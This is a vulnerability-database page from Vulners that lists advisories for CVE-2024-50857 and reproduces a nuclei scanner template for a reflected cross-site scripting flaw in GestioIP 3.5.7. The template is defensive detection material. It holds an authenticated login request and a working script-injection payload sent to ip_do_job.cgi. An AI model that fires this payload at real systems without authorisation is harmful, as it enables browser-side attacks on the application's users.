Lucene search
K

GestioIP - Reflected Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

GestioIP 3.5.7 has reflected XSS due to unsanitized ip_do_job input and requires specific user permissions.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-50857
15 Jan 202500:03
circl
CNNVD
GestioIP 安全漏洞
14 Jan 202500:00
cnnvd
CVE
CVE-2024-50857
14 Jan 202500:00
cve
Cvelist
CVE-2024-50857
14 Jan 202500:00
cvelist
Exploit DB
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
14 Apr 202500:00
exploitdb
NVD
CVE-2024-50857
14 Jan 202522:15
nvd
OSV
CVE-2024-50857
14 Jan 202522:15
osv
Packet Storm
📄 GestioIP 3.5.7 Cross Site Scripting
15 Apr 202500:00
packetstorm
Positive Technologies
PT-2025-2890
14 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-50857
23 May 202507:04
redhatcve
Rows per page
id: CVE-2024-50857

info:
  name: GestioIP - Reflected Cross-Site Scripting
  author: Gaurang
  severity: medium
  description: |
    GestioIP v3.5.7 contains a reflected cross-site scripting caused by unsanitized input in the ip_do_job request, letting attackers execute scripts in the victim's browser, exploit requires specific user permissions.
  impact: |
    Attackers can execute scripts in victims' browsers, leading to data theft and potential CSRF attacks.
  remediation: |
    Sanitize user input in the ip_do_job request and update to the latest version of GestioIP.
  reference:
    - https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
    - https://github.com/muebel/gestioip-docker-compose
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50857
    - http://www.gestioip.net
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2024-50857
    cwe-id: CWE-79
    epss-score: 0.01172
    epss-percentile: 0.63659
    cpe: cpe:2.3:a:gestioip:gestioip:3.5.7:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: gestioip
    product: gestioip
  tags: cve,cve2024,gestioip,xss,reflected,authenticated
flow: http(1) && http(2)

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        httpd_username={{username}}&httpd_password={{password}}&login=login&create_csrf_token=true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Gesti&oacute", "logout")'
          - 'status_code == 200'
        condition: and

  - raw:
      - |
        GET /gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "bad format (6b) <script>alert(document.domain)</script>")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100a300435b785e6feed05b0ad36bc950e8ad5e10aa4c9da5e1f2432c3dca27ec11022006fe392dc685441379a3ff65dbf15bd9bf1d526325bbdf035eedc0761d56daae:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.14.8
EPSS0.01172
SSVC
17